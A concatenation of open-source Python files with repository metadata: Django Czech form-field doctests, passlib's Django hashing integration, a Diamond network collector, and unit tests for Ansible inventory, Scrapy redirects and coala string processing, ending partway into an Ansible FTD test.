u'<select name="regions">\n<option value="PR">Prague</option>\n<option value="CE">Central Bohemian Region</option>\n<option value="SO">South Bohemian Region</option>\n<option value="PI">Pilsen Region</option>\n<option value="CA">Carlsbad Region</option>\n<option value="US">Usti Region</option>\n<option value="LB">Liberec Region</option>\n<option value="HK">Hradec Region</option>\n<option value="PA">Pardubice Region</option>\n<option value="VY">Vysocina Region</option>\n<option value="SM">South Moravian Region</option>\n<option value="OL">Olomouc Region</option>\n<option value="ZL">Zlin Region</option>\n<option value="MS">Moravian-Silesian Region</option>\n</select>'
# CZBirthNumberField ########################################################
>>> from django.contrib.localflavor.cz.forms import CZBirthNumberField
>>> f = CZBirthNumberField()
>>> f.clean('880523/1237')
u'880523/1237'
>>> f.clean('8805231237')
u'8805231237'
>>> f.clean('880523/000')
u'880523/000'
>>> f.clean('880523000')
u'880523000'
>>> f.clean('882101/0011')
u'882101/0011'
>>> f.clean('880523/1237', 'm')
u'880523/1237'
>>> f.clean('885523/1231', 'f')
u'885523/1231'
>>> f.clean('123456/12')
Traceback (most recent call last):
...
ValidationError: [u'Enter a birth number in the format XXXXXX/XXXX or XXXXXXXXXX.']
>>> f.clean('123456/12345')
Traceback (most recent call last):
...
ValidationError: [u'Enter a birth number in the format XXXXXX/XXXX or XXXXXXXXXX.']
>>> f.clean('12345612')
Traceback (most recent call last):
...
ValidationError: [u'Enter a birth number in the format XXXXXX/XXXX or XXXXXXXXXX.']
>>> f.clean('12345612345')
Traceback (most recent call last):
...
ValidationError: [u'Enter a birth number in the format XXXXXX/XXXX or XXXXXXXXXX.']
>>> f.clean('881523/0000', 'm')
Traceback (most recent call last):
...
ValidationError: [u'Enter a valid birth number.']
>>> f.clean('885223/0000', 'm')
Traceback (most recent call last):
...
ValidationError: [u'Enter a valid birth number.']
>>> f.clean('881223/0000', 'f')
Traceback (most recent call last):
...
ValidationError: [u'Enter a valid birth number.']
>>> f.clean('886523/0000', 'f')
Traceback (most recent call last):
...
ValidationError: [u'Enter a valid birth number.']
>>> f.clean('880523/1239')
Traceback (most recent call last):
...
ValidationError: [u'Enter a valid birth number.']
>>> f.clean('8805231239')
Traceback (most recent call last):
...
ValidationError: [u'Enter a valid birth number.']
>>> f.clean('990101/0011')
Traceback (most recent call last):
...
ValidationError: [u'Enter a valid birth number.']
# CZICNumberField ########################################################
>>> from django.contrib.localflavor.cz.forms import CZICNumberField
>>> f = CZICNumberField()
>>> f.clean('12345679')
u'12345679'
>>> f.clean('12345601')
u'12345601'
>>> f.clean('12345661')
u'12345661'
>>> f.clean('12345610')
u'12345610'
>>> f.clean('1234567')
Traceback (most recent call last):
...
ValidationError: [u'Enter a valid IC number.']
>>> f.clean('12345660')
Traceback (most recent call last):
...
ValidationError: [u'Enter a valid IC number.']
>>> f.clean('12345600')
Traceback (most recent call last):
...
ValidationError: [u'Enter a valid IC number.']
"""
| Smarsh/django | tests/regressiontests/forms/localflavor/cz.py | Python | bsd-3-clause | 4,319 |
"""passlib.ext.django.models -- monkeypatch django hashing framework"""
#=============================================================================
# imports
#=============================================================================
# core
import logging; log = logging.getLogger(__name__)
from warnings import warn
# site
from django import VERSION
from django.conf import settings
# pkg
from passlib.context import CryptContext
from passlib.exc import ExpectedTypeError
from passlib.ext.django.utils import _PatchManager, hasher_to_passlib_name, \
get_passlib_hasher, get_preset_config
from passlib.utils.compat import callable, unicode, bytes
# local
__all__ = ["password_context"]
#=============================================================================
# global attrs
#=============================================================================
# the context object which this patches contrib.auth to use for password hashing.
# configuration controlled by ``settings.PASSLIB_CONFIG``.
password_context = CryptContext()
# function mapping User objects -> passlib user category.
# may be overridden via ``settings.PASSLIB_GET_CATEGORY``.
def _get_category(user):
"""default get_category() implementation"""
if user.is_superuser:
return "superuser"
elif user.is_staff:
return "staff"
else:
return None
# object used to track state of patches applied to django.
_manager = _PatchManager(log=logging.getLogger(__name__ + "._manager"))
# patch status
_patched = False
#=============================================================================
# applying & removing the patches
#=============================================================================
def _apply_patch():
"""monkeypatch django's password handling to use ``passlib_context``,
assumes the caller will configure the object.
"""
#
# setup constants
#
log.debug("preparing to monkeypatch 'django.contrib.auth' ...")
global _patched
assert not _patched, "monkeypatching already applied"
HASHERS_PATH = "django.contrib.auth.hashers"
MODELS_PATH = "django.contrib.auth.models"
USER_PATH = MODELS_PATH + ":User"
FORMS_PATH = "django.contrib.auth.forms"
#
# import UNUSUABLE_PASSWORD and is_password_usuable() helpers
# (providing stubs for older django versions)
#
if VERSION < (1,4):
has_hashers = False
if VERSION < (1,0):
UNUSABLE_PASSWORD = "!"
else:
from django.contrib.auth.models import UNUSABLE_PASSWORD
def is_password_usable(encoded):
return encoded is not None and encoded != UNUSABLE_PASSWORD
def is_valid_secret(secret):
return secret is not None
elif VERSION < (1,6):
has_hashers = True
from django.contrib.auth.hashers import UNUSABLE_PASSWORD, \
is_password_usable
# NOTE: 1.4 - 1.5 - empty passwords no longer valid.
def is_valid_secret(secret):
return bool(secret)
else:
has_hashers = True
from django.contrib.auth.hashers import is_password_usable
# 1.6 - empty passwords valid again
def is_valid_secret(secret):
return secret is not None
if VERSION < (1,6):
def make_unusable_password():
return UNUSABLE_PASSWORD
else:
from django.contrib.auth.hashers import make_password as _make_password
def make_unusable_password():
return _make_password(None)
# django 1.4.6+ uses a separate hasher for "sha1$$digest" hashes
has_unsalted_sha1 = (VERSION >= (1,4,6))
#
# backport ``User.set_unusable_password()`` for Django 0.9
# (simplifies rest of the code)
#
if not hasattr(_manager.getorig(USER_PATH), "set_unusable_password"):
assert VERSION < (1,0)
@_manager.monkeypatch(USER_PATH)
def set_unusable_password(user):
user.password = make_unusable_password()
@_manager.monkeypatch(USER_PATH)
def has_usable_password(user):
return is_password_usable(user.password)
#
# patch ``User.set_password() & ``User.check_password()`` to use
# context & get_category (would just leave these as wrappers for hashers
# module under django 1.4, but then we couldn't pass User object into
# get_category very easily)
#
@_manager.monkeypatch(USER_PATH)
def set_password(user, password):
"passlib replacement for User.set_password()"
if is_valid_secret(password):
# NOTE: pulls _get_category from module globals
cat = _get_category(user)
user.password = password_context.encrypt(password, category=cat)
else:
user.set_unusable_password()
@_manager.monkeypatch(USER_PATH)
def check_password(user, password):
"passlib replacement for User.check_password()"
hash = user.password
if not is_valid_secret(password) or not is_password_usable(hash):
return False
if not hash and VERSION < (1,4):
return False
# NOTE: pulls _get_category from module globals
cat = _get_category(user)
ok, new_hash = password_context.verify_and_update(password, hash,
category=cat)
if ok and new_hash is not None:
# migrate to new hash if needed.
user.password = new_hash
user.save()
return ok
#
# override check_password() with our own implementation
#
@_manager.monkeypatch(HASHERS_PATH, enable=has_hashers)
@_manager.monkeypatch(MODELS_PATH)
def check_password(password, encoded, setter=None, preferred="default"):
"passlib replacement for check_password()"
# XXX: this currently ignores "preferred" keyword, since it's purpose
# was for hash migration, and that's handled by the context.
if not is_valid_secret(password) or not is_password_usable(encoded):
return False
ok = password_context.verify(password, encoded)
if ok and setter and password_context.needs_update(encoded):
setter(password)
return ok
#
# patch the other functions defined in the ``hashers`` module, as well
# as any other known locations where they're imported within ``contrib.auth``
#
if has_hashers:
@_manager.monkeypatch(HASHERS_PATH)
@_manager.monkeypatch(MODELS_PATH)
def make_password(password, salt=None, hasher="default"):
"passlib replacement for make_password()"
if not is_valid_secret(password):
return make_unusable_password()
if hasher == "default":
scheme = None
else:
scheme = hasher_to_passlib_name(hasher)
kwds = dict(scheme=scheme)
handler = password_context.handler(scheme)
# NOTE: django make specify an empty string for the salt,
# even if scheme doesn't accept a salt. we omit keyword
# in that case.
if salt is not None and (salt or 'salt' in handler.setting_kwds):
kwds['salt'] = salt
return password_context.encrypt(password, **kwds)
@_manager.monkeypatch(HASHERS_PATH)
@_manager.monkeypatch(FORMS_PATH)
def get_hasher(algorithm="default"):
"passlib replacement for get_hasher()"
if algorithm == "default":
scheme = None
else:
scheme = hasher_to_passlib_name(algorithm)
# NOTE: resolving scheme -> handler instead of
# passing scheme into get_passlib_hasher(),
# in case context contains custom handler
# shadowing name of a builtin handler.
handler = password_context.handler(scheme)
return get_passlib_hasher(handler, algorithm=algorithm)
# identify_hasher() was added in django 1.5,
# patching it anyways for 1.4, so passlib's version is always available.
@_manager.monkeypatch(HASHERS_PATH)
@_manager.monkeypatch(FORMS_PATH)
def identify_hasher(encoded):
"passlib helper to identify hasher from encoded password"
handler = password_context.identify(encoded, resolve=True,
required=True)
algorithm = None
if (has_unsalted_sha1 and handler.name == "django_salted_sha1" and
encoded.startswith("sha1$$")):
# django 1.4.6+ uses a separate hasher for "sha1$$digest" hashes,
# but passlib just reuses the "sha1$salt$digest" handler.
# we want to resolve to correct django hasher.
algorithm = "unsalted_sha1"
return get_passlib_hasher(handler, algorithm=algorithm)
_patched = True
log.debug("... finished monkeypatching django")
def _remove_patch():
"""undo the django monkeypatching done by this module.
offered as a last resort if it's ever needed.
.. warning::
This may cause problems if any other Django modules have imported
their own copies of the patched functions, though the patched
code has been designed to throw an error as soon as possible in
this case.
"""
global _patched
if _patched:
log.debug("removing django monkeypatching...")
_manager.unpatch_all(unpatch_conflicts=True)
password_context.load({})
_patched = False
log.debug("...finished removing django monkeypatching")
return True
if _manager: # pragma: no cover -- sanity check
log.warning("reverting partial monkeypatching of django...")
_manager.unpatch_all()
password_context.load({})
log.debug("...finished removing django monkeypatching")
return True
log.debug("django not monkeypatched")
return False
#=============================================================================
# main code
#=============================================================================
def _load():
global _get_category
# TODO: would like to add support for inheriting config from a preset
# (or from existing hasher state) and letting PASSLIB_CONFIG
# be an update, not a replacement.
# TODO: wrap and import any custom hashers as passlib handlers,
# so they could be used in the passlib config.
# load config from settings
_UNSET = object()
config = getattr(settings, "PASSLIB_CONFIG", _UNSET)
if config is _UNSET:
# XXX: should probably deprecate this alias
config = getattr(settings, "PASSLIB_CONTEXT", _UNSET)
if config is _UNSET:
config = "passlib-default"
if config is None:
warn("setting PASSLIB_CONFIG=None is deprecated, "
"and support will be removed in Passlib 1.8, "
"use PASSLIB_CONFIG='disabled' instead.",
DeprecationWarning)
config = "disabled"
elif not isinstance(config, (unicode, bytes, dict)):
raise ExpectedTypeError(config, "str or dict", "PASSLIB_CONFIG")
# load custom category func (if any)
get_category = getattr(settings, "PASSLIB_GET_CATEGORY", None)
if get_category and not callable(get_category):
raise ExpectedTypeError(get_category, "callable", "PASSLIB_GET_CATEGORY")
# check if we've been disabled
if config == "disabled":
if _patched: # pragma: no cover -- sanity check
log.error("didn't expect monkeypatching would be applied!")
_remove_patch()
return
# resolve any preset aliases
if isinstance(config, str) and '\n' not in config:
config = get_preset_config(config)
# setup context
_apply_patch()
password_context.load(config)
if get_category:
# NOTE: _get_category is module global which is read by
# monkeypatched functions constructed by _apply_patch()
_get_category = get_category
log.debug("passlib.ext.django loaded")
# wrap load function so we can undo any patching if something goes wrong
try:
_load()
except:
_remove_patch()
raise
#=============================================================================
# eof
#=============================================================================
| charukiewicz/beer-manager | venv/lib/python3.4/site-packages/passlib/ext/django/models.py | Python | mit | 12,558 |
# coding=utf-8
"""
The NetworkCollector class collects metrics on network interface usage
using /proc/net/dev.
#### Dependencies
* /proc/net/dev
"""
import diamond.collector
from diamond.collector import str_to_bool
import diamond.convertor
import os
import re
try:
import psutil
except ImportError:
psutil = None
class NetworkCollector(diamond.collector.Collector):
PROC = '/proc/net/dev'
def get_default_config_help(self):
config_help = super(NetworkCollector, self).get_default_config_help()
config_help.update({
'interfaces': 'List of interface types to collect',
'greedy': 'Greedy match interfaces',
})
return config_help
def get_default_config(self):
"""
Returns the default collector settings
"""
config = super(NetworkCollector, self).get_default_config()
config.update({
'path': 'network',
'interfaces': ['eth', 'bond', 'em', 'p1p', 'eno', 'enp', 'ens',
'enx'],
'byte_unit': ['bit', 'byte'],
'greedy': 'true',
})
return config
def collect(self):
"""
Collect network interface stats.
"""
# Initialize results
results = {}
if os.access(self.PROC, os.R_OK):
# Open File
file = open(self.PROC)
# Build Regular Expression
greed = ''
if str_to_bool(self.config['greedy']):
greed = '\S*'
exp = (('^(?:\s*)((?:%s)%s):(?:\s*)' +
'(?P<rx_bytes>\d+)(?:\s*)' +
'(?P<rx_packets>\w+)(?:\s*)' +
'(?P<rx_errors>\d+)(?:\s*)' +
'(?P<rx_drop>\d+)(?:\s*)' +
'(?P<rx_fifo>\d+)(?:\s*)' +
'(?P<rx_frame>\d+)(?:\s*)' +
'(?P<rx_compressed>\d+)(?:\s*)' +
'(?P<rx_multicast>\d+)(?:\s*)' +
'(?P<tx_bytes>\d+)(?:\s*)' +
'(?P<tx_packets>\w+)(?:\s*)' +
'(?P<tx_errors>\d+)(?:\s*)' +
'(?P<tx_drop>\d+)(?:\s*)' +
'(?P<tx_fifo>\d+)(?:\s*)' +
'(?P<tx_colls>\d+)(?:\s*)' +
'(?P<tx_carrier>\d+)(?:\s*)' +
'(?P<tx_compressed>\d+)(?:.*)$') %
(('|'.join(self.config['interfaces'])), greed))
reg = re.compile(exp)
# Match Interfaces
for line in file:
match = reg.match(line)
if match:
device = match.group(1)
results[device] = match.groupdict()
# Close File
file.close()
else:
if not psutil:
self.log.error('Unable to import psutil')
self.log.error('No network metrics retrieved')
return None
network_stats = psutil.network_io_counters(True)
for device in network_stats.keys():
network_stat = network_stats[device]
results[device] = {}
results[device]['rx_bytes'] = network_stat.bytes_recv
results[device]['tx_bytes'] = network_stat.bytes_sent
results[device]['rx_packets'] = network_stat.packets_recv
results[device]['tx_packets'] = network_stat.packets_sent
for device in results:
stats = results[device]
for s, v in stats.items():
# Get Metric Name
metric_name = '.'.join([device, s])
# Get Metric Value
metric_value = self.derivative(metric_name,
long(v),
diamond.collector.MAX_COUNTER)
# Convert rx_bytes and tx_bytes
if s == 'rx_bytes' or s == 'tx_bytes':
convertor = diamond.convertor.binary(value=metric_value,
unit='byte')
for u in self.config['byte_unit']:
# Public Converted Metric
self.publish(metric_name.replace('bytes', u),
convertor.get(unit=u), 2)
else:
# Publish Metric Derivative
self.publish(metric_name, metric_value)
return None
| dcsquared13/Diamond | src/collectors/network/network.py | Python | mit | 4,536 |
# Copyright 2015 Abhijit Menon-Sen <[email protected]>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import string
from ansible.compat.tests import unittest
from ansible.compat.tests.mock import patch
from ansible.inventory.manager import InventoryManager, split_host_pattern
from ansible.vars.manager import VariableManager
from units.mock.loader import DictDataLoader
class TestInventory(unittest.TestCase):
patterns = {
'a': ['a'],
'a, b': ['a', 'b'],
'a , b': ['a', 'b'],
' a,b ,c[1:2] ': ['a', 'b', 'c[1:2]'],
'9a01:7f8:191:7701::9': ['9a01:7f8:191:7701::9'],
'9a01:7f8:191:7701::9,9a01:7f8:191:7701::9': ['9a01:7f8:191:7701::9', '9a01:7f8:191:7701::9'],
'9a01:7f8:191:7701::9,9a01:7f8:191:7701::9,foo': ['9a01:7f8:191:7701::9', '9a01:7f8:191:7701::9', 'foo'],
'foo[1:2]': ['foo[1:2]'],
'a::b': ['a::b'],
'a:b': ['a', 'b'],
' a : b ': ['a', 'b'],
'foo:bar:baz[1:2]': ['foo', 'bar', 'baz[1:2]'],
}
pattern_lists = [
[['a'], ['a']],
[['a', 'b'], ['a', 'b']],
[['a, b'], ['a', 'b']],
[['9a01:7f8:191:7701::9', '9a01:7f8:191:7701::9,foo'],
['9a01:7f8:191:7701::9', '9a01:7f8:191:7701::9', 'foo']]
]
# pattern_string: [ ('base_pattern', (a,b)), ['x','y','z'] ]
# a,b are the bounds of the subscript; x..z are the results of the subscript
# when applied to string.ascii_letters.
subscripts = {
'a': [('a', None), list(string.ascii_letters)],
'a[0]': [('a', (0, None)), ['a']],
'a[1]': [('a', (1, None)), ['b']],
'a[2:3]': [('a', (2, 3)), ['c', 'd']],
'a[-1]': [('a', (-1, None)), ['Z']],
'a[-2]': [('a', (-2, None)), ['Y']],
'a[48:]': [('a', (48, -1)), ['W', 'X', 'Y', 'Z']],
'a[49:]': [('a', (49, -1)), ['X', 'Y', 'Z']],
'a[1:]': [('a', (1, -1)), list(string.ascii_letters[1:])],
}
ranges_to_expand = {
'a[1:2]': ['a1', 'a2'],
'a[1:10:2]': ['a1', 'a3', 'a5', 'a7', 'a9'],
'a[a:b]': ['aa', 'ab'],
'a[a:i:3]': ['aa', 'ad', 'ag'],
'a[a:b][c:d]': ['aac', 'aad', 'abc', 'abd'],
'a[0:1][2:3]': ['a02', 'a03', 'a12', 'a13'],
'a[a:b][2:3]': ['aa2', 'aa3', 'ab2', 'ab3'],
}
def setUp(self):
fake_loader = DictDataLoader({})
self.i = InventoryManager(loader=fake_loader, sources=[None])
def test_split_patterns(self):
for p in self.patterns:
r = self.patterns[p]
self.assertEqual(r, split_host_pattern(p))
for p, r in self.pattern_lists:
self.assertEqual(r, split_host_pattern(p))
def test_ranges(self):
for s in self.subscripts:
r = self.subscripts[s]
self.assertEqual(r[0], self.i._split_subscript(s))
self.assertEqual(
r[1],
self.i._apply_subscript(
list(string.ascii_letters),
r[0][1]
)
)
class InventoryDefaultGroup(unittest.TestCase):
def test_empty_inventory(self):
inventory = self._get_inventory('')
self.assertIn('all', inventory.groups)
self.assertIn('ungrouped', inventory.groups)
self.assertFalse(inventory.groups['all'].get_hosts())
self.assertFalse(inventory.groups['ungrouped'].get_hosts())
def test_ini(self):
self._test_default_groups("""
host1
host2
host3
[servers]
host3
host4
host5
""")
def test_ini_explicit_ungrouped(self):
self._test_default_groups("""
[ungrouped]
host1
host2
host3
[servers]
host3
host4
host5
""")
def _get_inventory(self, inventory_content):
fake_loader = DictDataLoader({__file__: inventory_content})
return InventoryManager(loader=fake_loader, sources=[__file__])
def _test_default_groups(self, inventory_content):
inventory = self._get_inventory(inventory_content)
self.assertIn('all', inventory.groups)
self.assertIn('ungrouped', inventory.groups)
all_hosts = set(host.name for host in inventory.groups['all'].get_hosts())
self.assertEqual(set(['host1', 'host2', 'host3', 'host4', 'host5']), all_hosts)
ungrouped_hosts = set(host.name for host in inventory.groups['ungrouped'].get_hosts())
self.assertEqual(set(['host1', 'host2', 'host3']), ungrouped_hosts)
servers_hosts = set(host.name for host in inventory.groups['servers'].get_hosts())
self.assertEqual(set(['host3', 'host4', 'host5']), servers_hosts)
| tux-00/ansible | test/units/inventory/test_inventory.py | Python | gpl-3.0 | 5,504 |
import unittest
from scrapy.contrib.downloadermiddleware.redirect import RedirectMiddleware
from scrapy.spider import BaseSpider
from scrapy.exceptions import IgnoreRequest
from scrapy.http import Request, Response, HtmlResponse, Headers
class RedirectMiddlewareTest(unittest.TestCase):
def setUp(self):
self.spider = BaseSpider('foo')
self.mw = RedirectMiddleware()
def test_priority_adjust(self):
req = Request('http://a.com')
rsp = Response('http://a.com', headers={'Location': 'http://a.com/redirected'}, status=301)
req2 = self.mw.process_response(req, rsp, self.spider)
assert req2.priority > req.priority
def test_redirect_301(self):
def _test(method):
url = 'http://www.example.com/301'
url2 = 'http://www.example.com/redirected'
req = Request(url, method=method)
rsp = Response(url, headers={'Location': url2}, status=301)
req2 = self.mw.process_response(req, rsp, self.spider)
assert isinstance(req2, Request)
self.assertEqual(req2.url, url2)
self.assertEqual(req2.method, method)
# response without Location header but with status code is 3XX should be ignored
del rsp.headers['Location']
assert self.mw.process_response(req, rsp, self.spider) is rsp
_test('GET')
_test('POST')
_test('HEAD')
def test_dont_redirect(self):
url = 'http://www.example.com/301'
url2 = 'http://www.example.com/redirected'
req = Request(url, meta={'dont_redirect': True})
rsp = Response(url, headers={'Location': url2}, status=301)
r = self.mw.process_response(req, rsp, self.spider)
assert isinstance(r, Response)
assert r is rsp
def test_redirect_302(self):
url = 'http://www.example.com/302'
url2 = 'http://www.example.com/redirected2'
req = Request(url, method='POST', body='test',
headers={'Content-Type': 'text/plain', 'Content-length': '4'})
rsp = Response(url, headers={'Location': url2}, status=302)
req2 = self.mw.process_response(req, rsp, self.spider)
assert isinstance(req2, Request)
self.assertEqual(req2.url, url2)
self.assertEqual(req2.method, 'GET')
assert 'Content-Type' not in req2.headers, \
"Content-Type header must not be present in redirected request"
assert 'Content-Length' not in req2.headers, \
"Content-Length header must not be present in redirected request"
assert not req2.body, \
"Redirected body must be empty, not '%s'" % req2.body
# response without Location header but with status code is 3XX should be ignored
del rsp.headers['Location']
assert self.mw.process_response(req, rsp, self.spider) is rsp
def test_redirect_302_head(self):
url = 'http://www.example.com/302'
url2 = 'http://www.example.com/redirected2'
req = Request(url, method='HEAD')
rsp = Response(url, headers={'Location': url2}, status=302)
req2 = self.mw.process_response(req, rsp, self.spider)
assert isinstance(req2, Request)
self.assertEqual(req2.url, url2)
self.assertEqual(req2.method, 'HEAD')
# response without Location header but with status code is 3XX should be ignored
del rsp.headers['Location']
assert self.mw.process_response(req, rsp, self.spider) is rsp
def test_meta_refresh(self):
body = """<html>
<head><meta http-equiv="refresh" content="5;url=http://example.org/newpage" /></head>
</html>"""
req = Request(url='http://example.org')
rsp = HtmlResponse(url='http://example.org', body=body)
req2 = self.mw.process_response(req, rsp, self.spider)
assert isinstance(req2, Request)
self.assertEqual(req2.url, 'http://example.org/newpage')
def test_meta_refresh_with_high_interval(self):
# meta-refresh with high intervals don't trigger redirects
body = """<html>
<head><meta http-equiv="refresh" content="1000;url=http://example.org/newpage" /></head>
</html>"""
req = Request(url='http://example.org')
rsp = HtmlResponse(url='http://example.org', body=body)
rsp2 = self.mw.process_response(req, rsp, self.spider)
assert rsp is rsp2
def test_meta_refresh_trough_posted_request(self):
body = """<html>
<head><meta http-equiv="refresh" content="5;url=http://example.org/newpage" /></head>
</html>"""
req = Request(url='http://example.org', method='POST', body='test',
headers={'Content-Type': 'text/plain', 'Content-length': '4'})
rsp = HtmlResponse(url='http://example.org', body=body)
req2 = self.mw.process_response(req, rsp, self.spider)
assert isinstance(req2, Request)
self.assertEqual(req2.url, 'http://example.org/newpage')
self.assertEqual(req2.method, 'GET')
assert 'Content-Type' not in req2.headers, \
"Content-Type header must not be present in redirected request"
assert 'Content-Length' not in req2.headers, \
"Content-Length header must not be present in redirected request"
assert not req2.body, \
"Redirected body must be empty, not '%s'" % req2.body
def test_max_redirect_times(self):
self.mw.max_redirect_times = 1
req = Request('http://scrapytest.org/302')
rsp = Response('http://scrapytest.org/302', headers={'Location': '/redirected'}, status=302)
req = self.mw.process_response(req, rsp, self.spider)
assert isinstance(req, Request)
assert 'redirect_times' in req.meta
self.assertEqual(req.meta['redirect_times'], 1)
self.assertRaises(IgnoreRequest, self.mw.process_response, req, rsp, self.spider)
def test_ttl(self):
self.mw.max_redirect_times = 100
req = Request('http://scrapytest.org/302', meta={'redirect_ttl': 1})
rsp = Response('http://www.scrapytest.org/302', headers={'Location': '/redirected'}, status=302)
req = self.mw.process_response(req, rsp, self.spider)
assert isinstance(req, Request)
self.assertRaises(IgnoreRequest, self.mw.process_response, req, rsp, self.spider)
def test_redirect_urls(self):
req1 = Request('http://scrapytest.org/first')
rsp1 = Response('http://scrapytest.org/first', headers={'Location': '/redirected'}, status=302)
req2 = self.mw.process_response(req1, rsp1, self.spider)
rsp2 = Response('http://scrapytest.org/redirected', headers={'Location': '/redirected2'}, status=302)
req3 = self.mw.process_response(req2, rsp2, self.spider)
self.assertEqual(req2.url, 'http://scrapytest.org/redirected')
self.assertEqual(req2.meta['redirect_urls'], ['http://scrapytest.org/first'])
self.assertEqual(req3.url, 'http://scrapytest.org/redirected2')
self.assertEqual(req3.meta['redirect_urls'], ['http://scrapytest.org/first', 'http://scrapytest.org/redirected'])
if __name__ == "__main__":
unittest.main()
| mzdaniel/oh-mainline | vendor/packages/scrapy/scrapy/tests/test_downloadermiddleware_redirect.py | Python | agpl-3.0 | 7,244 |
import unittest
class StringProcessingTestBase(unittest.TestCase):
# The backslash character. Needed since there are limitations when
# using backslashes at the end of raw-strings in front of the
# terminating " or '.
bs = "\\"
# Basic test strings all StringProcessing functions should test.
test_strings = [
r"out1 'escaped-escape: \\ ' out2",
r"out1 'escaped-quote: \' ' out2",
r"out1 'escaped-anything: \X ' out2",
r"out1 'two escaped escapes: \\\\ ' out2",
r"out1 'escaped-quote at end: \'' out2",
r"out1 'escaped-escape at end: \\' out2",
r"out1 'str1' out2 'str2' out2",
r"out1 \' 'str1' out2 'str2' out2",
r"out1 \\\' 'str1' out2 'str2' out2",
r"out1 \\ 'str1' out2 'str2' out2",
r"out1 \\\\ 'str1' out2 'str2' out2",
r"out1 \\'str1' out2 'str2' out2",
r"out1 \\\\'str1' out2 'str2' out2",
r"out1 'str1''str2''str3' out2",
r"",
r"out1 out2 out3",
bs,
2 * bs]
# Test string for multi-pattern tests (since we want to variate the
# pattern, not the test string).
multi_pattern_test_string = (r"abcabccba###\\13q4ujsabbc\+'**'ac"
r"###.#.####-ba")
# Multiple patterns for the multi-pattern tests.
multi_patterns = [r"abc",
r"ab",
r"ab|ac",
2 * bs,
r"#+",
r"(a)|(b)|(#.)",
r"(?:a(b)*c)+",
r"1|\+"]
# Test strings for the remove_empty_matches feature (alias auto-trim).
auto_trim_test_pattern = r";"
auto_trim_test_strings = [r";;;;;;;;;;;;;;;;",
r"\\;\\\\\;\\#;\\\';;\;\\\\;+ios;;",
r"1;2;3;4;5;6;",
r"1;2;3;4;5;6;7",
r"",
r"Hello world",
r"\;",
r"\\;",
r"abc;a;;;;;asc"]
# Test strings for search-in-between functions.
search_in_between_begin_pattern = r"("
search_in_between_end_pattern = r")"
search_in_between_test_strings = [
r"()assk(This is a word)and((in a word) another ) one anyway.",
r"bcc5(((((((((((((((((((1)2)3)))))))))))))))))",
r"Let's (do (it ) more ) complicated ) ) ) () (hello.)",
r"()assk\\(This\ is a word\)and((in a\\\ word\\\\\) another \)) "
r"one anyway.",
r"bcc5\(\(\((((((\\\(((((((((((1)2)3))\\\\\)))))))))))))\)\)",
r"Let's \(do (it ) more ) \\ complicated ) ) ) () (hello.)\\z"]
@staticmethod
def _construct_message(func, args, kwargs):
"""
Constructs the error message for the call result assertions.
:param func: The function that was called.
:param args: The argument tuple the function was invoked with.
:param kwargs: The named arguments dict the function was invoked with.
:param return: The error message.
"""
args = [repr(x) for x in args]
kwargs = [str(key) + '=' + repr(value)
for key, value in kwargs.items()]
return "Called {}({}).".format(func.__name__, ", ".join(args + kwargs))
def assertResultsEqual(self,
func,
invocation_and_results,
postprocess=lambda result: result):
"""
Tests each given invocation against the given results with the
specified function.
:param func: The function to test.
:param invocation_and_results: A dict containing the invocation tuple
as key and the result as value.
:param postprocess: A function that shall process the
returned result from the tested
function. The function must accept only
one parameter as postprocessing input.
Performs no postprocessing by default.
"""
for args, result in invocation_and_results.items():
self.assertEqual(
postprocess(func(*args)),
result,
self._construct_message(func, args, {}))
def assertResultsEqualEx(self,
func,
invocation_and_results,
postprocess=lambda result: result):
"""
Tests each given invocation against the given results with the
specified function. This is an extended version of
``assertResultsEqual()`` that supports also ``**kwargs``.
:param func: The function to test.
:param invocation_and_results: A dict containing the invocation tuple
as key and the result as value. The
tuple contains (args, kwargs).
:param postprocess: A function that shall process the
returned result from the tested
function. The function must accept only
one parameter as postprocessing input.
Performs no postprocessing by default.
"""
for (args, kwargs), result in invocation_and_results.items():
self.assertEqual(
postprocess(func(*args, **kwargs)),
result,
self._construct_message(func, args, kwargs))
| yland/coala | tests/parsing/StringProcessing/StringProcessingTestBase.py | Python | agpl-3.0 | 5,848 |
# Copyright (c) 2018 Cisco and/or its affiliates.
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
from __future__ import absolute_import
import pytest
from units.modules.utils import set_module_args, exit_json, fail_json, AnsibleFailJson, AnsibleExitJson
from ansible.module_utils import basic
from ansible.module_utils.network.ftd.common import FtdConfigurationError, FtdServerError, FtdUnexpectedResponse
from ansible.module_utils.network.ftd.configuration import FtdInvalidOperationNameError, CheckModeException
from ansible.module_utils.network.ftd.fdm_swagger_client import ValidationError
from ansible.modules.network.ftd import ftd_configuration
class TestFtdConfiguration(object):
module = ftd_configuration
@pytest.fixture(autouse=True)
def module_mock(self, mocker):
return mocker.patch.multiple(basic.AnsibleModule, exit_json=exit_json, fail_json=fail_json)
@pytest.fixture(autouse=True)
def connection_mock(self, mocker):
connection_class_mock = mocker.patch('ansible.modules.network.ftd.ftd_configuration.Connection')
return connection_class_mock.return_value
@pytest.fixture
def resource_mock(self, mocker):
resource_class_mock = mocker.patch('ansible.modules.network.ftd.ftd_configuration.BaseConfigurationResource')
resource_instance = resource_class_mock.return_value
return resource_instance.execute_operation
def test_module_should_fail_when_ftd_invalid_operation_name_error(self, resource_mock):
operation_name = 'test name'
resource_mock.side_effect = FtdInvalidOperationNameError(operation_name)
result = self._run_module_with_fail_json({'operation': operation_name})
assert result['failed']
assert 'Invalid operation name provided: %s' % operation_name == result['msg']
def test_module_should_fail_when_ftd_configuration_error(self, resource_mock):
operation_name = 'test name'
msg = 'Foo error.'
